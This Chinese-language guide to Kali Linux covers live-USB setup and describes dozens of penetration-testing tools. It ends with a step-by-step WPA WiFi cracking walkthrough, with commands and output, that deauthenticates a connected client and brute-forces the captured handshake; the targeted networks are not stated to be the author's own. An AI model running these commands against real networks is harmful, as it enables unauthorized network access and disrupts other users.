Kali和渗透测试

Kali Linux

Kali Linux是基于Debian的Linux发行版， 设计用于数字取证操作系统，预装了许多渗透测试软件。
由Offensive Security Ltd维护和资助。其前身是BackTrack系统。

官网：https://www.kali.org/

使用U盘/移动硬盘以live方式启动Kali

1. 在Kali官网https://www.kali.org/downloads/下载Kali的live版本：Kali Linux 64-Bit (Live)。其Torrent文件使用迅雷下载可以加速到非常快。kali-linux-2020.1-live-amd64.iso.torrent版本的官方的Torrent文件可以使用CSDN的备份：https://download.csdn.net/download/zhiyuan411/12155280
2. 将U盘/移动硬盘中的数据提前备份好，因为之后它会被格式化为FAT32格式。
3. 在UltraISO官网https://cn.ultraiso.net/xiazai.html下载试用版，使用UltraISO的菜单：启动->写入磁盘映像 功能来将Kali的iso文件写入到U盘/移动硬盘中。
4. 使用DiskGenius来重新分区，将U盘/移动硬盘后部的空间独立为新的空间，格式化为NTFS格式，方便在Kali启动后挂载为数据空间来使用。

启动Kali和常见操作

1. 选择从U盘/移动硬盘启动后可以见到Kali的启动界面，选择“Live System”的方式来启动。
2. 首先连接wifi，然后安装中文字体：sudo apt-get install xfonts-intl-chinese和sudo apt-get install ttf-wqy-microhei，这样中文就不会显示为方框了。
3. 在系统菜单的settings->power manager中设置，将休眠时间，屏保时间等都设置为never，将合上笔记本盖的动作设置为仅关闭屏幕。
4. 系统桌面上会展示可以挂载的硬盘，双击就会自动挂载。
5. 桌面系统的快捷键类似Windows，例如Ctrl+C，Ctrl+V等。
6. 系统的Terminal中，可以使用Ctrl+Shift+C复制，Ctrl+Shift+V粘贴，或者使用右键操作。
7. 系统自带打开pdf文件的软件，该软件在最下方可以设置缩放大小。
8. 常见密码字典参见：旧版的 Kali手记。

Kali工具集

工具列表和分类

官方工具列表，点击工具名可以查看工具介绍和用法的详情：https://tools.kali.org/tools-listing

菜单工具分类：

1. Information Gathering 信息收集
2. Vulnerability Analysis 漏洞分析
3. Web Application Analysis Web应用程序分析
4. Database Assessment 数据库评估
5. Password Attacks 密码攻击
6. Wireless Attacks 无线攻击
7. Reverse Engineering 逆向工程
8. Exploitation Tools 漏洞利用工具
9. Sniffing & Spoofing 嗅探和欺骗
10. Post Exploitation 后漏洞利用
11. Forensics 取证
12. Reporting Tools 报表工具
13. Social Engineering Tools 社会工程学工具

aircrack-ng

Aircrack-ng 是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK方式的wifi密码的攻击解密。

reaver

Reaver 是一个针对开启了WPS的wifi进行暴力解密的工具。
WPS是许多路由器上都有的一个功能，可以为用户提供简单的配置过程，它与设备中硬编码保存的一个PIN码绑定在一起。Reaver 利用的就是PIN码的一个缺陷，最终的结果就是，只要有足够的时间，它就能解密PIN码，并推演出WPA或WPA2的密码。

ettercap-graphical

ettercap是执行ARP欺骗嗅探的工具，通常用它来施行中间人攻击。
ettercap-graphical 是 ettercap 的图形化界面工具。

wireshark

Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark是直接与网卡进行数据报文交换。

netdiscover

Netdiscover 是一个主动/被动的 ARP 侦查工具。使用 Netdiscover工具可以在网络上扫描 IP 地址，检查在线的主机。
ARP是将IP地址转化物理地址的网络协议。通过该协议，可以判断某个IP地址是否被使用，从而发现网络中存活的主机。Netdiscover工具，就是借助该协议实施主机发现。它既可以以被动模式嗅探存活的主机，也可以以主动模式扫描主机。

nmap

Nmap，也就是Network Mapper，最早是Linux下的网络扫描和嗅探工具包，用来扫描网上主机开放的网络端口，确定哪些服务运行在哪些端口，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。

sparta

Sparta 是一个nmap、nikto、hydra等工具的集合，利用各个优秀工具的结合，提供GUI界面，使渗透测试更加便捷。

ike-scan

现在的虚拟专用网络都是基于IPsec技术搭建的，默认使用UDP协议，端口为500。由于IPsec规定，服务不会对错误格式包响应，所以，无法被TCP扫描和UDP扫描发现。ike-scan就是嗅探虚拟专用网络的工具，不仅支持IPsec 虚拟专用网络的两种工作连接模式，进行指纹识别，还可以伪造各种不规范包，以获取更多的信息。

dmitry

DMitry（Deepmagic Information Gathering Tool）是一个一体化的信息收集工具。它可以根据IP或域名来收集以下信息：查询目标主机的Whois信息，子域，电子邮箱地址等信息。

recon-ng

Recon-NG是一款功能极为强大的网络侦查和Web信息收集工具。

maltego

Maltego 主要功能是开源情报收集和取证，不局限于某个领域，支持定制来使用接口数据或者内网数据，而且可以将收集的信息可视化，用一种格外美观的方式将结果呈现给使用者。

nikto

Nikto是一款开源的（GPL）网页服务器扫描器，它可以对网页服务器进行全面的多种扫描，包含超过3300种有潜在危险的文件/CGIs；超过625种服务器版本；超过230种特定服务器问题。扫描项和插件可以自动更新（如果需要），但其软件本身并不经常更新，最新和最危险的可能检测不到。

unix-privesc-check

unix-privesc-check是一款提权漏洞检测工具，可以检测所在系统的错误配置，以发现可以用于提权的漏洞。该工具适用于安全审计、渗透测试和系统维护等场景。它可以检测与权限相关的各类文件的读写权限，如认证相关文件、重要配置文件、交换区文件、cron job文件、设备文件、其他用户的Home目录、正在执行的文件等等。如果发现可以利用的漏洞，就会给出提示warning。
unix-privesc-check并不会检测所有提权漏洞的潜在情况。它只是快速进行检测，并以简洁的方式给出提权漏洞相关的建议，大大减少用户在文件权限检测方面的枯燥工作的量。

skipfish

Skipfish 是谷歌的一款Web安全扫描工具。它通过执行递归爬网和基于字典的探针为目标站点准备交互式站点地图并进行安全检查。该工具生成的最终报告旨在作为专业Web应用程序安全评估的基础。

burpsuite

Burp Suite 是用于攻击 web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

sqlmap

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术，分别是：

• 基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
• 基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
• 基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。
• 联合查询注入，可以使用union的情况下的注入。
• 堆查询注入，可以同时执行多条语句的执行时的注入。

commix

commix 是一款自动化的系统命令注入工具，和sqlmap一起使用，基本覆盖了所有类型的注入检测。

wpscan

WPScan是针对Wordpress的专用扫描器，可帮助检测安全配置，主题，插件和用户权限等问题。

crunch

crunch是密码字典生成工具。

cewl

cewl 通过抓取目标网站的指定层数的页面，自动根据页面的内容来生成单词列表词典。

hashcat

HashCat 是最好的利用GPU来爆破HASH的软件。

john

John the Ripper 是一个快速的基于字典的密码爆破工具，用于在已知密文的情况下尝试解密出明文的软件，支持目前大多数的加密算法，如DES、MD4、MD5等，和不同类型的系统架构，如Unix、Linux、Windows、DOS模式、BeOS和OpenVMS，主要用于Crack不够牢固的Unix/Linux系统密码。

medusa

Medusa 是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC的密码爆破工具。

ncrack

对FTP等网络身份验证进行爆破的工具。

ophcrack

Ophcrack是一个使用彩虹表（Rainbow table）来对Windows密码进行crack的工具。

kismet

kismet 是一个无线扫描工具，可以扫描到周围附近所用可用的Ap，以及信道等信息。同时还可以捕获网络中的数据包到一个文件中，方便分析数据包。

pixiewps

pixiewps 是一个WPS离线攻击工具，利用了芯片上的算法漏洞来攻击。

fern wifi cracker

GUI版本的WEP/WPA/WPS方式的wifi的自动化攻击工具。

wifite

基于 Aircrack-ng 的全自动Wifi探测器和自动化攻击工具，支持批量WEP/WPA/WPS方式的wifi的自动化攻击。

radare2

Radare2是一款开放源代码的逆向工程平台，功能非常强大，包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等等，同时具备超强的脚本加载能力，并且可以运行在几乎所有主流的平台（GNU/Linux, .Windows, BSD, iOS, OSX, Solaris…）上，比IDA Pro，OllyDBG的跨平台性还好，可谓一大神器。

metasploit framework

目前为止，最流行，最强大，最具扩展性的渗透测试平台软件。
MSF 本身包含了很多漏洞攻击模块，由一群开发者在进行维护和更新，更重要的是几乎每个 CVE（Common Vulnerabilities & Exposures，公共漏洞和暴露） 漏洞都会被添加到 MSF 里，有人称之为是“可以黑掉整个宇宙”的渗透测试框架。
它允许使用者开发自己的漏洞脚本，从而进行测试。

msfpc

MSFvenom Payload Creator 是一个基于用户选择生成多种类型Payload（目标系统上渗透成功后执行的攻击代码）的包装器，是配合 metasploit framework 的工具。

searchsploit

searchsploit 是一个用于Exploit-DB的命令行搜索工具，支持本地离线查询和在线查询。
Exploit Database（https://github.com/offensive-security/exploit-database）这是Offensive Security（https://www.offensive-security.com/）赞助的一个项目。存储了大量的漏洞利用程序，可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作，目前是世界上公开收集漏洞最全的数据库，该仓库每天都会更新。

social engineering toolkit

Social-Engineering Toolkit（SET） 社会工程学工具集，里面包含了许多用于进行社会工程学攻击的工具，例如钓鱼网站生成器等。
SET和Metasploit之间的亲密配合更是完美无缺。

macchanger

修改linux下的mac地址，从而实现伪装的目的。

mitmproxy

mitmproxy即man-in-the-middle proxy，中间人代理。和fiddler、Charles等工具类似，通过代理方式实现对http(s)的拦截。

netsniff-ng

Netsniff-NG 是一个高性能的网络嗅探器的工具套件，支持数据的捕获，重放，过滤等。

responder

responder 这个工具首先是一个LLMNR（在Windows Vista中引入，基于DNS包格式的协议）和NBT-NS（NetBIOS名称服务）响应者，不仅可以嗅探，还可以发起欺骗 。
为了渗透方便，该工具还可以伪造HTTP/s、SMB、SQL Server、FTP、IMAP、POP3等多项服务，从而采用钓鱼的方式获取服务认证信息，如用户名和密码等。

mimikatz

mimikatz 是一款强大的系统密码解密获取工具，当成功的获取到一个远程会话时，使用mimikatz工具可以很快的恢复密码。现在它已被添加到Metasploit框架中，并作为一个可加载的Meterpreter模块。

powersploit

PowerSploit是GitHub上面的一个安全项目，上面有很多PowerShell（cmd升级版，从Win7开始提供）攻击脚本，它们主要被用来渗透中的信息侦察、权限提升、权限维持。

proxychains

ProxyChains 可以让命令通过指定的proxy访问网络，一般用于加速更新和下载国外的一些开源组件，比如yum和pip。

weevely

weevely 是一款集webshell生成和连接于一身的工具，采用c/s模式构建，具有很好的隐蔽性（生成随机参数且base64加密），集服务器错误配置审计，后门放置，爆破，文件管理，资源搜索，网络代理，命令执行，数据库操作，系统信息收集及端口扫描等功能，只支持PHP。

autopsy

Autopsy Forensic Browser 是一个用来分析磁盘映像和恢复文件的开源取证工具。提供在磁盘映像中进行字符串提取，恢复文件，时间轴分析，chrome，firefox 等浏览历史分析，关键字搜索和邮件分析等功能。

binwalk

Binwalk 是用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具。 它被设计用于识别嵌入固件镜像内的文件和代码。Binwalk与Unix文件实用程序创建的魔数签名兼容，还包括了一个自定义魔数签名文件，其中包含常见的诸如压缩/存档文件,固件头,Linux内核,引导加载程序,文件系统等的固件映像中常见文件的改进魔数签名。

bulk_extractor

bulk_extractor 是从数字证据文件中提取诸如电子邮件地址,信用卡号,URL和其他类型的信息的功能的程序，它甚至能处理压缩数据(如ZIP,PDF和GZIP文件)以及不完整或部分损坏的数据。

cutycapt

cutycapt 可以在程序里直接将网页转为图片，而无需调用浏览器进行截图保存。

faraday IDE

Faraday提出了IPE（Integrated Penetration Environment，渗透测试集成环境）的概念。它是一款类似编程IDE的工具，他将大量的工具整合在一起。用户只需要在内置的终端进行操作，Faraday就会分析执行结果，自动进行整合，便于用户进行分析。

pipal

pipal 是一款密码统计分析工具。它可以对一个密码字典的所有密码进行统计分析，统计出最常用的密码、最常用的基础词语、密码长度占比、构成字符占比、单类字符密码占比、结尾字符构成情况占比等等方面。根据这些信息，安全人员可以分析密码特点，撰写对应的密码分析报告文件。

其他

SQLite database browser

可视化查询和操作SQLite数据库的客户端。

wordlists

指向 Kali 自带的词典的目录的快捷方式。

clang/clang++

Clang/Clang++是一个C语言、C++、Objective-C语言的轻量级LLVM编译器。其中，clang++是clang的一个快捷方式。

NASM shell

Netwide Assembler 是一个80x86和x86-64汇编器，它支持一系列的目标文件格式，包括Linux和BSD a.out，ELF，COFF，Mach-O，16位和32位OBJ（OMF）格式，Win32和Win64。

exe2hex

将exe文件编码为16进制表示的ASCII码文本格式，从而方便传输，在Windows端可以使用DEBUG.exe或者 PowerShell 来恢复为exe文件。

hashdeep

hashdeep 可以批量计算文件的哈希值，并和哈希值列表进行比对验证。

recordmydesktop

RecordMyDesktop 是linux下的录屏软件。

Kali的使用教程

Wifi Crack

# 查看可以用于监听的网卡，此处为wlan0
kali@kali:~$ sudo airmon-ng
PHY     Interface       Driver          Chipset
phy0    wlan0           iwlwifi         Intel Corporation Wireless 8260 (rev 3a)


# 让网卡wlan0进入监听模式
# 结果里的 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon 表示成功开启监听模式，名称被重命名为wlan0mon
kali@kali:~$ sudo airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
    PID Name
   1200 NetworkManager
   1286 wpa_supplicant
PHY     Interface       Driver          Chipset
phy0    wlan0           iwlwifi         Intel Corporation Wireless 8260 (rev 3a)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)


# 查看wlan0mon当前的wifi信息
# PWR表示信号强弱，绝对值越小则信号越强
# 该结果信息最好保存一份，以供之后查询wifi的BSSID等信息
kali@kali:~$ sudo airodump-ng wlan0mon
CH  8 ][ Elapsed: 1 min ][ 2020-02-13 23:34   
                                 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
            
 70:C7:F2:12:65:CC  -49       49        0    0   3  130  WPA2 CCMP   PSK  CMCC-wz74  
 72:FE:A1:BC:62:0E  -49       46        0    0  10  130  WPA2 CCMP   PSK  CU_RWXS    
 74:05:A5:BC:04:09  -49       44        2    0  11  270  WPA2 CCMP   PSK  TP-LINK_0409                                 
 EC:F8:EB:E0:37:75  -64       10        2    0   3  130  WPA2 CCMP   PSK  st1707     
 50:64:2B:E7:AE:B7  -64        1       26    0   2  130  WPA2 CCMP   PSK  Xiaomi_AEB6
 40:B0:76:AE:60:98  -69       40        4    0  10  195  WPA2 CCMP   PSK  maolver    
 04:D7:A5:5E:E6:84  -70       10        0    0   1  270  WPA2 CCMP   PSK  xiangyu1803


# 选取一个wifi进行攻击，其参数均可以从上步信息中获取
# --bssid 是wifi的BSSID
# -c11 是wifi的频道
# -w 是数据记录的位置，最好是独立的数据硬盘分区下；也可以是主目录下，但数据量大容易系统死机
# -w 参数里最后的部分“TP-LINK_0409”是生成的数据文件的前缀，可以设置成和wifi名称相关的信息，便于识别
# 结果里的 STATION 列为连接wifi的客户端的BSSID
# 当结果的头部出现类似“WPA handshake: 74:05:A5:BC:04:09”的字样时，说明找到了握手密钥。此时可以Ctrl+C来停止执行。
kali@kali:~$ sudo airodump-ng -c11 --bssid 74:05:A5:BC:04:09 -w /media/kali/3256AD36945EAF56/crack-workspace/TP-LINK_0409 wlan0mon
 CH 11 ][ Elapsed: 2 mins ][ 2020-02-13 23:40 ][ WPA handshake: 74:05:A5:BC:04:09      
     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
     
 74:05:A5:BC:04:09  -51 100     1552      114    4  11  270  WPA2 CCMP   PSK  TP-LINK_0409   
     
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe           
     
 74:05:A5:BC:04:09  48:A5:E7:01:C3:12  -62    0e-24e     1      486


# 新开一个窗口，对上面的wifi的客户端进行deauth攻击，使其断开连接重连wifi，从而获取握手密钥
# 该命令参数均可以从上步中获取
# -0 表示进行deauth攻击，后面跟的是攻击次数
# -a 是wifi的BSSID
# -c 是客户端的BSSID
kali@kali:~$ sudo aireplay-ng -0 2 -a 74:05:A5:BC:04:09 -c 48:A5:E7:01:C3:12 wlan0mon
02:14:04  Waiting for beacon frame (BSSID: 74:05:A5:BC:04:09) on channel 11
02:14:05  Sending 64 directed DeAuth (code 7). STMAC: [48:A5:E7:01:C3:12] [41|70 ACKs]
02:14:05  Sending 64 directed DeAuth (code 7). STMAC: [48:A5:E7:01:C3:12] [30|50 ACKs]


# 对握手密钥进行暴力字典匹配
# -a2 表示是对WPA类型密钥进行crack
# -b 是wifi的BSSID
# -w 是字典文件的位置
# 最后跟的参数是密钥文件，可以使用*匹配多个
# 当结果里的“Current passphrase: 13911190275”变成“KEY FOUND! [ REAL-PASSWORD ]”时，说明找到了密码。
kali@kali:~$ sudo aircrack-ng -a2 -b 74:05:A5:BC:04:09 -w /run/live/medium/crack-wifi/passwordDict.txt /media/kali/3256AD36945EAF56/crack-workspace/TP-LINK_0409-*.cap
Opening /media/kali/3256AD36945EAF56/crack-workspace/TP-LINK_0409-01.cap
Read 1963 packets.
1 potential targets

                              Aircrack-ng 1.5.2
      [01:28:49] 55622808/387867998 keys tested (10431.94 k/s)
      Time left: 8 hours, 50 minutes, 51 seconds                14.34%
                       Current passphrase: 13911190275               

      Master Key     : 8A C3 0D 42 3B 95 7D 30 FA F4 91 13 17 6C 65 FF
                       38 9E E4 26 1F B6 54 5C 60 0D 5B 20 2E D8 6E 15
      Transient Key  : 94 6F 2A B9 06 41 06 8E 41 8A AA 3B 7A 0D 1C 8F
                       6D EE 9A 08 A1 6C 64 BF 67 BB 84 E3 36 A2 4C 3A
                       AC 85 E2 47 E8 89 EA 58 20 7E 1D 6A 12 39 EC 35
                       78 36 BF 82 9B 22 5F B1 22 07 42 69 7B 13 41 7B
      EAPOL HMAC     : 98 F0 66 E4 B5 68 B1 30 21 0C B1 82 F1 A2 5D 09